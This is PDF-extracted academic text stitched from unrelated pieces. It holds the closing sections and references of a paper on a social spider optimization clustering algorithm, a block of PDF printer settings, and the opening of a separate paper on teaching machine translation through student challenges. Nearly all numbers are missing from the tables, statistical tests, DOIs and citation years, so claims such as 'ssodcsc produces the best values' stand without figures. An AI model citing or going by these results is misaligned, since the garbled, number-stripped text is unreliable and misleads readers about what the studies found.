time per iteration. table specifies the average cpu time per iteration (in seconds), when clustering algorithms were applied on the vowel dataset. it was found that k-means produces clustering results with the shortest average cpu time per iteration. the ssodcsc has the second shortest average cpu time per iteration. table specifies f-measure values obtained by the clustering algorithms when they are applied on the iris, glass, vowel, wine, cancer, and cmc datasets, respectively. it is evident that ssodcsc produces the best f-measure values. the overall percentage increase in the f-measure value is approximately %. we computed the icd and inter-cluster distances of the resultant clusters of the clustering algorithms when applied on uci datasets. from figs. to it is obvious that table best three spiders of wine dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . . . . . spider . . . . . . . . . . . . . spider . . . . . . . . . . . . , . table best six spiders of glass dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . table comparison of clustering algorithms in terms of average cpu time per iteration (in seconds): cmc dataset. k-means pso ibco aco smsso bfgsa sos sso ssodcsc best . . . . . . . . . average . . . . . . . . . worst . . . . . . . . . table comparison of clustering algorithms in terms of average cpu time per iteration (in seconds): vowel dataset. k-means pso ibco aco smsso bfgsa sos sso ssodcsc best . . . . . . . . . average . . . . . . . . . worst . . . . . . . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ssodcsc produces the smallest icd for uci datasets. from figs. to it can be concluded that ssodcsc produces the largest inter-cluster distances for uci datasets, as compared with other clustering algorithms. table specifies the comparison between clustering algorithms with respect to the average silhouette coefficient values of uci datasets. ssodcsc produces better average silhouette coefficient values for uci datasets also. the average silhouette coefficient values produced by ssodcsc are . , . , . , . , . , and . for wine, cancer, cmc, vowel, iris, and glass datasets, respectively. statistical analysis: patent corpus datasets to show the significance of the proposed algorithm, we applied a one-way anova test on the accuracy values shown in table . sum, sum squared, mean, and variance of the clustering algorithms are specified in table . table comparison of clustering algorithms in terms of f-measure values: uci datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc wine . . . . . . . . . . . cancer . . . . . . . . . . . cmc . . . . . . . . . . . vowel . . . . . . . . . . . iris . . . . . . . . . . . glass . . . . . . . . . . . note: the best values are specified in bold. figure intra-cluster distances: uci datasets: iris and glass datasets. the figure compares the clustering algorithms based on intra-cluster distances when applied on iris and glass datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure intra-cluster distances: uci datasets: wine and bupa datasets. the figure compares intra- cluster distances of clustering algorithms when applied on wine and bupa datasets. full-size doi: . /peerj-cs. /fig- figure intra-cluster distances: uci datasets: haberman, cancer, and cmc datasets. the figure compares intra-cluster distances of clustering algorithms when applied on haberman, cancer, and cmc datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure inter-cluster distances: uci datasets: iris, haberman, cancer, and cmc. the figure compares inter-cluster distances of clustering algorithms when applied on iris, haberman, cancer, and cmc datasets. full-size doi: . /peerj-cs. /fig- figure inter-cluster distances: uci datasets: glass, wine, and bupa datasets. the figure compares inter-cluster distances of clustering algorithms when applied on glass, wine, and bupa datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ degrees of freedom: df = , df = sum of squares for treatment (sstr) = , . sum of squares for error (sse) = , . table average silhouette coefficient value: uci datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc wine . . . . . . . . . . . cancer . . . . . . . . . . . cmc . . . . . . . . . . . vowel . . . . . . . . . . . iris . . . . . . . . . . . glass . . . . . . . . . . . note: the best values are specified in bold. table statistical results of one-way anova test when applied on accuracy values returned by clustering algorithms for patent corpus datasets. dataset sum sum squared mean variance k-means . , . . . pso . , . . . ga . , . . . abc . , . . . ibco . , . . . aco . , . . . smsso . , . . . bfgsa . , . . . sos . , . . . sso . , . . . ssodcsc . , . . . table statistical results of one-way anova test when applied on f-measure values returned by clustering algorithms for uci datasets. dataset sum sum squared mean variance k-means . , . . . pso . , . . . ga . , . . . abc . , . . . ibco . , . . . aco . , . . . smsso . , . . . bfgsa . , . . . sos . , . . . sso . , . . . ssodcsc . , . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ total sum of squares (sst = sse + sstr) = , . mean square treatment (mstr = sstr/df ) = . mean square error (mse = sse/df ) = . f (= mstr/mse) = . probability of calculated f = . f critical ( % one tailed) = . we can reject the null hypothesis as calculated f ( . ) is greater than f critical ( . ). ) post-hoc analysis using tukeys’ honestly significant difference method: assuming significance level of %. studentized range for df = and df = is . . tukey honestly significant difference = . . mean of k-means and ssodcsc differs as . is greater than . . mean of pso and ssodcsc differs as . is greater than . . mean of genetic algorithms (ga) and ssodcsc differs as . is greater than . . mean of artificial bee colony (abc) and ssodcsc differs as . is greater than . . mean of improved bee colony optimization (ibco) and ssodcsc differs as . is greater than . . mean of aco and ssodcsc differs as . is greater than . . mean of smsso and ssodcsc differs as . is greater than . . mean of bfgsa and ssodcsc differs as . is greater than . . mean of sos and ssodcsc differs as . is greater than . . mean of sso and ssodcsc differs as . is greater than . . therefore, it may be concluded that ssodcsc significantly differs from other clustering algorithms. statistical analysis: uci datasets to show the significance of the proposed algorithm, we applied a one-way anova test on the f-measure values shown in table . sum, sum squared, mean, and variance of the clustering algorithms are specified in table . degrees of freedom: df = , df = . sum of squares for treatment (sstr) = , . . sum of squares for error (sse) = , . . total sum of squares (sst = sse + sstr) = , . . mean square treatment (mstr = sstr/df ) = . . mean square error (mse = sse/df ) = . . f (= mstr/mse) = . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ probability of calculated f = . . f critical ( % one tailed) = . . so, we can reject the null hypothesis as calculated f ( . ) is greater than f critical ( . ). ) post-hoc analysis using tukeys’ honestly significant difference method assuming significance level of %. studentized range for df = and df = is . . tukey honestly significant difference = . . means of ga and ssodcsc differ as . is greater than . . means of abc and ssodcsc differ as . is greater than . . means of ibco and ssodcsc differ as . is greater than . . means of aco and ssodcsc differ as . is greater than . . means of smsso and ssodcsc differ as . is greater than . . means of bfgsa and ssodcsc differ as . is greater than . . means of sos and ssodcsc differ as . is greater than . . therefore, it is obvious that ssodcsc significantly differs from most of the other clustering algorithms when applied on uci datasets. discussion we applied our proposed algorithm on patent corpus datasets (patentcorpus , ) and uci datasets (lickman, ). if the population size is small then the optimal solution is hard to find. if it is large, then the optimal solution is guaranteed with a side effect of higher computational complexity. we used spiders to obtain the optimal solution without the side effect of higher computational complexity. among these spiders, % were female spiders and the remaining were male spiders. the tp value was set to . . we compared the clustering results of ssodcsc with other clustering algorithms such as k-means, pso, ga, abc optimization, aco, ibco (forsati, keikha & shamsfard, ), smsso, bfgsa, sos, and sso implementation in which each spider is a collection of k centroids, and found that ssodcsc produces better clustering results. in order to conduct experiments, we formed the patent corpus dataset by taking text documents that belong to six different classes, patent corpus dataset by taking text documents that belong to seven different classes, patent corpus dataset by taking text documents that belong to nine different classes, patent corpus dataset by taking text documents that belong to nine different classes, patent corpus dataset by taking text documents that belong to eight different classes, and patent corpus dataset by taking text documents that belong to seven different classes of patent corpus data repository. the clustering quality can be validated using icd and inter-cluster distances. the smaller value for intra-cluster distance and a larger value for inter-cluster distance are the requirements for any clustering algorithm. we computed the icd and inter-cluster distances of the resultant clusters of the clustering algorithms, when applied on patent thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ corpus datasets and uci datasets, and found that ssodcsc produces better results than the other clustering algorithms. we compared the clustering algorithms on the basis of average cpu time per iteration (in seconds). we found that ssodcsc has the shortest average cpu time per iteration with respect to most of the datasets. the reasons for this are its ability to produce a better solution space after every iteration, to initialize the solution space in less time, to compute fitness values of the spiders in less time, and to find the next positions of the spiders in less time. we compared the clustering algorithms on the basis of the average silhouette coefficient value. we found that ssodcsc produces better average silhouette coefficient values for both patent corpus datasets and uci datasets. we conducted a one-way anova test separately on the clustering results of patent corpus datasets and uci datasets to show the superiority and applicability of the proposed method with respect to text datasets and feature based datasets. conclusion in this paper, we proposed a novel implementation of sso for data clustering using a single centroid representation and enhanced mating. additionally, we allowed non-dominant male spiders to mate with female spiders by converting them into dominant males. as a result, the explorative power of the algorithm has been increased and thereby the chance of getting a global optimum has been improved. we compared ssodcsc with other state-of-the-art algorithms and found that it produces better clustering results. we applied ssodcsc on patent corpus text datasets and uci datasets and got better clustering results than other algorithms. we conducted a one-way anova test to show its superiority and applicability with respect to text datasets and feature-based datasets. future work will include the study of applicability of ssodcsc in data classification of brain computer interfaces. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ravichandran thalamala conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, studying literature. � janet barnabas conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � a.v. reddy conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools. data availability the following information was supplied regarding data availability: the two datasets are available in the supplemental files. the proposed algorithm was applied on text data files in patentcorpus datasets and feature/attribute-based uci datasets. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aloise d, deshpande a, hansen p, popat p. . np-hardness of euclidean sum-of-squares clustering. machine learning ( ): – doi . /s - - - . alswaitti m, albughdadi m, isa nam. . density-based particle swarm optimization algorithm for data clustering. expert systems with applications : – doi . /j.eswa. . . . beil f, ester m, xu x. . frequent term-based text clustering. in: proceedings of international conference on knowledge discovery and data mining kdd ‘ , alberta, – . bernábe-loranca b, gonzalez-velázquez r, olivares-benítez e, ruiz-vanoye j, martínez-flores j. . extensions to k-medoids with balance restrictions over the cardinality of the partitions. journal of applied research and technology ( ): – doi . /s - ( ) - . chandran tr, reddy av, janet b. . an effective implementation of social spider optimization for text document clustering using single cluster approach. in: second international conference on inventive communication and computational technologies (icicct), coimbatore, – . chen s, sun t, yang f, sun h, guan y. . an improved optimum-path forest clustering algorithm for remote sensing image segmentation. computers & geosciences : – doi . /j.cageo. . . . costa kap, pereira lam, nakamura rym, pereira cr, papa jp, falcão ax. . a nature-inspired approach to speed up optimum-path forest clustering and its application to intrusion detection in computer networks. information sciences : – doi . /j.ins. . . . cuevas e, cienfuegos m. . a new algorithm inspired in the behavior of the social-spider for constrained optimization. expert systems with applications ( ): – doi . /j.eswa. . . . cuevas e, cienfuegos m, zaldívar d, pérez-cisneros m. . a swarm optimization algorithm inspired in the behavior of the social-spider. expert systems with applications ( ): – doi . /j.eswa. . . . de andrade silva j, hruschka er, gama j. . an evolutionary algorithm for clustering data streams with a variable number of clusters. expert systems with applications : – doi . /j.eswa. . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forsati r, keikha a, shamsfard m. . an improved bee colony optimization algorithm with an application to document clustering. neurocomputing : – . guha s, rastogi r, shim k. . cure: an efficient clustering algorithm for large databases. acm sigmod record ( ): – doi . / . . han xh, quan l, xiong xy, almeter m, xiang j, lan y. . a novel data clustering algorithm based on modified gravitational search algorithm. engineering applications of artificial intelligence : – doi . /j.engappai. . . . jothi r, mohanty sk, ojha a. . fast approximate minimum spanning tree based clustering algorithm. neurocomputing : – doi . /j.neucom. . . . karypis g, han e-h, kumar v. . chameleon: hierarchical clustering using dynamic modeling. computer ( ): – doi . / . . lickman m. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/ datasets.php. mihai d, mocanu m. . statistical considerations on the k-means algorithm. annals of the university of craiova, mathematics and computer science series ( ): – . nayak j, naik b, kanungo dp, behera hs. . a hybrid elicit teaching learning based optimization with fuzzy c-means (etlbo-fcm) algorithm for data clustering. ain shams engineering journal ( ): – doi . /j.asej. . . . nayak j, nanda m, nayak k, naik b, behera hs. . an improved firefly fuzzy c-means (fafcm) algorithm for clustering real world data sets. in: kumar kundu m, mohapatra d, konar a, chakraborty a, eds. advanced computing, networking and informatics, vol. . smart innovation, systems and technologies. vol. . cham: springer. ng rt, han j. . clarans: a method for clustering objects for spatial data mining. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . patentcorpus . . patent corpus datasets. available at http://www.ezcodesample. com/semanticsearchart/downloadsdatacorpus.html. rani y, rohil h. . a study of hierarchical clustering algorithm. international journal of information and computation technology ( ): – . shukla up, nanda sj. . parallel social spider clustering algorithm for high dimensional datasets. engineering applications of artificial intelligence : – doi . /j.engappai. . . . steinley d. . k-means clustering: a half-century synthesis. british journal of mathematical and statistical psychology ( ): – doi . / x . thalamala rc, reddy av, janet b. . a novel bio-inspired algorithm based on social spiders for improving performance and efficiency of data clustering. epub ahead of print february . journal of intelligent systems doi . /jisys- - . zhang t, ramakrishnan r, livny m. . birch: an efficient data clustering method for very large databases. in: proceedings of the acm sigmod international conference on management of data, montreal, – . zhou y, wu h, luo q, abdel-baset m. . automatic data clustering using nature-inspired symbiotic organism search algorithm. knowledge-based systems : – doi . /j.knosys. . . . zhou y, zhou y, luo q, abdel-basset m. . a simplex method-based social spider optimization algorithm for clustering analysis. engineering applications of artificial intelligence : – doi . /j.engappai. . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets.php http://dx.doi.org/ . /j.asej. . . http://dx.doi.org/ . /tkde. . http://www.ezcodesample.com/semanticsearchart/downloadsdatacorpus.html http://www.ezcodesample.com/semanticsearchart/downloadsdatacorpus.html http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . / x http://dx.doi.org/ . /jisys- - http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering introduction related work proposed algorithm: ssodcsc results discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice learning to translate with products of novices: a suite of open-ended challenge problems for teaching mt adam lopez , matt post , chris callison-burch , , jonathan weese, juri ganitkevitch, narges ahmidi, olivia buzek, leah hanson, beenish jamil, matthias lee, ya-ting lin, henry pao, fatima rivera, leili shahriyari, debu sinha, adam teichert, stephen wampler, michael weinberger, daguang xu, lin yang, and shang zhao∗ department of computer science, johns hopkins university human language technology center of excellence, johns hopkins university computer and information science department, university of pennsylvania abstract machine translation (mt) draws from several different disciplines, making it a complex sub- ject to teach. there are excellent pedagogical texts, but problems in mt and current algo- rithms for solving them are best learned by doing. as a centerpiece of our mt course, we devised a series of open-ended challenges for students in which the goal was to im- prove performance on carefully constrained instances of four key mt tasks: alignment, decoding, evaluation, and reranking. students brought a diverse set of techniques to the prob- lems, including some novel solutions which performed remarkably well. a surprising and exciting outcome was that student solutions or their combinations fared competitively on some tasks, demonstrating that even newcom- ers to the field can help improve the state-of- the-art on hard nlp problems while simulta- neously learning a great deal. the problems, baseline code, and results are freely available. introduction a decade ago, students interested in natural lan- guage processing arrived at universities having been exposed to the idea of machine translation (mt) primarily through science fiction. today, incoming students have been exposed to services like google translate since they were in secondary school or ear- lier. for them, mt is science fact. so it makes sense to teach statistical mt, either on its own or as a unit ∗ the first five authors were instructors and the remaining au- thors were students in the worked described here. this research was conducted while chris callison-burch was at johns hop- kins university. in a class on natural language processing (nlp), ma- chine learning (ml), or artificial intelligence (ai). a course that promises to show students how google translate works and teach them how to build some- thing like it is especially appealing, and several uni- versities and summer schools now offer such classes. there are excellent introductory texts—depending on the level of detail required, instructors can choose from a comprehensive mt textbook (koehn, ), a chapter of a popular nlp textbook (jurafsky and martin, ), a tutorial survey (lopez, ), or an intuitive tutorial on the ibm models (knight, b), among many others. but mt is not just an object of academic study. it’s a real application that isn’t fully perfected, and the best way to learn about it is to build an mt sys- tem. this can be done with open-source toolkits such as moses (koehn et al., ), cdec (dyer et al., ), or joshua (ganitkevitch et al., ), but these systems are not designed for pedagogy. they are mature codebases featuring tens of thousands of source code lines, making it difficult to focus on their core algorithms. most tutorials present them as black boxes. but our goal is for students to learn the key techniques in mt, and ideally to learn by doing. black boxes are incompatible with this goal. we solve this dilemma by presenting students with concise, fully-functioning, self-contained com- ponents of a statistical mt system: word alignment, decoding, evaluation, and reranking. each imple- mentation consists of a naı̈ve baseline algorithm in less than lines of python code. we assign them to students as open-ended challenges in which the goal is to improve performance on objective eval- uation metrics as much as possible. this setting mirrors evaluations conducted by the nlp research community and by the engineering teams behind high-profile nlp projects such as google translate and ibm’s watson. while we designate specific al- gorithms as benchmarks for each task, we encour- age creativity by awarding more points for the best systems. as additional incentive, we provide a web- based leaderboard to display standings in real time. in our graduate class on mt, students took a va- riety of different approaches to the tasks, in some cases devising novel algorithms. a more exciting re- sult is that some student systems or combinations of systems rivaled the state of the art on some datasets. designing mt challenge problems our goal was for students to freely experiment with different ways of solving mt problems on real data, and our approach consisted of two separable com- ponents. first, we provided a framework that strips key mt problems down to their essence so students could focus on understanding classic algorithms or invent new ones. second, we designed incentives that motivated them to improve their solutions as much as possible, encouraging experimentation with approaches beyond what we taught in class. . decoding, reranking, evaluation, and alignment for mt (dreamt) we designed four assignments, each corresponding to a real subproblem in mt: alignment, decoding, evaluation, and reranking. from the more general perspective of ai, they emphasize the key problems of unsupervised learning, search, evaluation design, and supervised learning, respectively. in real mt systems, these problems are highly interdependent, a point we emphasized in class and at the end of each assignment—for example, that alignment is an exer- cise in parameter estimation for translation models, that model choice is a tradeoff between expressivity and efficient inference, and that optimal search does not guarantee optimal accuracy. however, present- ing each problem independently and holding all else constant enables more focused exploration. for each problem we provided data, a naı̈ve solu- tion, and an evaluation program. following bird et al. ( ) and madnani and dorr ( ), we imple- mented the challenges in python, a high-level pro- http://alopez.github.io/dreamt gramming language that can be used to write very concise programs resembling pseudocode. , by de- fault, each baseline system reads the test data and generates output in the evaluation format, so setup required zero configuration, and students could be- gin experimenting immediately. for example, on re- ceipt of the alignment code, aligning data and eval- uating results required only typing: > align | grade students could then run experiments within minutes of beginning the assignment. three of the four challenges also included unla- beled test data (except the decoding assignment, as explained in § ). we evaluated test results against a hidden key when assignments were submitted. . incentive design we wanted to balance several pedagogical goals: un- derstanding of classic algorithms, free exploration of alternatives, experience with typical experimental design, and unhindered collaboration. machine translation is far from solved, so we ex- pected more than reimplementation of prescribed al- gorithms; we wanted students to really explore the problems. to motivate exploration, we made the as- signments competitive. competition is a powerful force, but must be applied with care in an educa- tional setting. we did not want the consequences of ambitious but failed experiments to be too dire, and we did not want to discourage collaboration. for each assignment, we guaranteed a passing grade for matching the performance of a specific tar- get algorithm. typically, the target was important but not state-of-the-art: we left substantial room for improvement, and thus competition. we told stu- dents the exact algorithm that produced the target ac- curacy (though we expected them to derive it them- selves based on lectures, notes, or literature). we did not specifically require them to implement it, but the guarantee of a passing grade provided a power- ful incentive for this to be the first step of each as- signment. submissions that beat this target received additional credit. the top five submissions received full credit, while the top three received extra credit. http://python.org some well-known mt systems have been implemented in python (chiang, ; huang and chiang, ). thanks to an anonymous reviewer for this turn of phrase. this scheme provided strong incentive to continue experimentation beyond the target algorithm. for each assignment, students could form teams of any size, under three rules: each team had to pub- licize its formation to the class, all team members agreed to receive the same grade, and teams could not drop members. our hope was that these require- ments would balance the perceived competitive ad- vantage of collaboration against a reluctance to take (and thus support) teammates who did not contribute to the competitive effort. this strategy worked: out of sixteen students, ten opted to work collaboratively on at least one assignment, always in pairs. we provided a web-based leaderboard that dis- played standings on the test data in real time, iden- tifying each submission by a pseudonymous han- dle known only to the team and instructors. teams could upload solutions as often as they liked before the assignment deadline. the leaderboard displayed scores of the default and target algorithms. this in- centivized an early start, since teams could verify for themselves when they met the threshold for a passing grade. though effective, it also detracted from realism in one important way: it enabled hill- climbing on the evaluation metric. in early assign- ments, we observed a few cases of this behavior, so for the remaining assignments, we modified the leaderboard so that changes in score would only be reflected once every twelve hours. this strategy trades some amount of scientific realism for some measure of incentive, a strategy that has proven effective in other pedagogical tools with real-time feedback (spacco et al., ). to obtain a grade, teams were required to sub- mit their results, share their code privately with the instructors, and publicly describe their experimen- tal process to the class so that everyone could learn from their collective effort. teams were free (but not required) to share their code publicly at any time. grades depend on institutional norms. in our case, high grades in the rest of class combined with matching all assignment tar- get algorithms would earn a b+; beating two target algorithms would earn an a-; top five placement on any assignment would earn an a; and top three placement compensated for weaker grades in other course criteria. everyone who completed all four assignments placed in the top five at least once. the equilibrium point is a single team, though this team would still need to decide on a division of labor. one student contem- plated organizing this team, but decided against it. some did so after the assignment deadline. the alignment challenge the first challenge was word alignment: given a par- allel text, students were challenged to produce word- to-word alignments with low alignment error rate (aer; och and ney, ). this is a variant of a classic assignment not just in mt, but in nlp gen- erally. klein ( ) describes a version of it, and we know several other instructors who use it. in most of these, the object is to implement ibm model or , or a hidden markov model. our version makes it open-ended by asking students to match or beat an ibm model baseline. . data we provided , sentences of parallel data from the canadian hansards, totaling around two million words. this dataset is small enough to align in a few minutes with our implementation—enabling rapid experimentation—yet large enough to obtain reasonable results. in fact, liang et al. ( ) report alignment accuracy on data of this size that is within a fraction of a point of their accuracy on the com- plete hansards data. to evaluate, we used manual alignments of a small fraction of sentences, devel- oped by och and ney ( ), which we obtained from the shared task resources organized by mihal- cea and pedersen ( ). the first sentences of the corpus were development data, with manual alignments provided in a separate file. test data con- sisted of an additional sentences, for which we did not provide alignments. . implementation we distributed three python programs with the data. the first, align, computes dice’s coefficient ( ) for every pair of french and english words, then aligns every pair for which its value is above an adjustable threshold. our implementation (most of among them, jordan boyd-graber, john denero, philipp koehn, and slav petrov (personal communication). http://www.isi.edu/natural-language/download/hansard/ this invited the possibility of cheating, since alignments of the test data are publicly available on the web. we did not adver- tise this, but as an added safeguard we obfuscated the data by distributing the test sentences randomly throughout the file. listing the default aligner in dreamt: thresh- olding dice’s coefficient. for (f, e) in bitext: for f_i in set(f): f_count[f_i] += for e_j in set(e): fe_count[(f_i,e_j)] += for e_j in set(e): e_count[e_j] += for (f_i, e_j) in fe_count.keys(): dice[(f_i,e_j)] = \ . * fe_count[(f_i, e_j)] / \ (f_count[f_i] + e_count[e_j]) for (f, e) in bitext: for (i, f_i) in enumerate(f): for (j, e_j) in enumerate(e): if dice[(f_i,e_j)] >= cutoff: print "%i-%i " % (i,j) which is shown in listing ) is quite close to pseu- docode, making it easy to focus on the algorithm, one of our pedagogical goals. the grade program computes aer and optionally prints an alignment grid for sentences in the development data, showing both human and automatic alignments. finally the check program verifies that the results represent a valid solution, reporting an error if not—enabling students to diagnose bugs in their submissions. the default implementation 